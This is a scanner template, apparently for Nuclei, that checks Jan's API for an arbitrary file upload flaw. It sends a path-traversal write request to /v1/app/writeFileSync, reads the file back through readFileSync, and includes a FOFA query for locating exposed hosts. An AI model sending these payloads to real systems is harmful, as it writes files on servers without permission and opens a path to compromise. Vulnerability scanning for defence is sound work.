id: jan-file-upload

info:
  name: Jan - Arbitrary File Upload
  author: pussycat0x
  severity: high
  description: |
    Jan's API interface writeFileSync and appendFileSync does not filter parameters, resulting in an arbitrary file upload vulnerability.
  reference:
    - https://github.com/wy876/POC/blob/main/Jan%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
    - https://github.com/HackAllSec/CVEs/blob/81e63ae5caae40be47905adae601e0c2f480190b/Jan%20Arbitrary%20File%20Upload%20vulnerability/README.md
  metadata:
    fofa-query: icon_hash="-165268926"
    max-request: 2
  tags: jan,intrusive,file-upload

variables:
  string: "{{to_lower(rand_base(5))}}"

http:
  - raw:
      - |
        POST /v1/app/writeFileSync HTTP/1.1
        Host: {{Hostname}}
        contentType: application/json
        Content-Type: text/plain;charset=UTF-8
        Origin: {{RootURL}}

        ["/../../../../../tmp/{{string}}.txt","{{randstr}}"]

      - |
        POST /v1/app/readFileSync HTTP/1.1
        Host: {{Hostname}}
        contentType: application/json
        Content-Type: text/plain;charset=UTF-8
        Origin: {{RootURL}}

        ["file:/../../../../../tmp/{{string}}.txt","utf-8"]

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{randstr}}'

      - type: word
        part: content_type_2
        words:
          - 'text/plain'
# digest: 4a0a00473045022100bab87139fb70667309d17f748b218ed04bd46430722ce1a85672fb48685efc1c0220027468b820d19a0c87d363387aecaaaf6a7448a21ca3584e58509cfbbe10f533:922c64590222798bb761d5b6d8e72950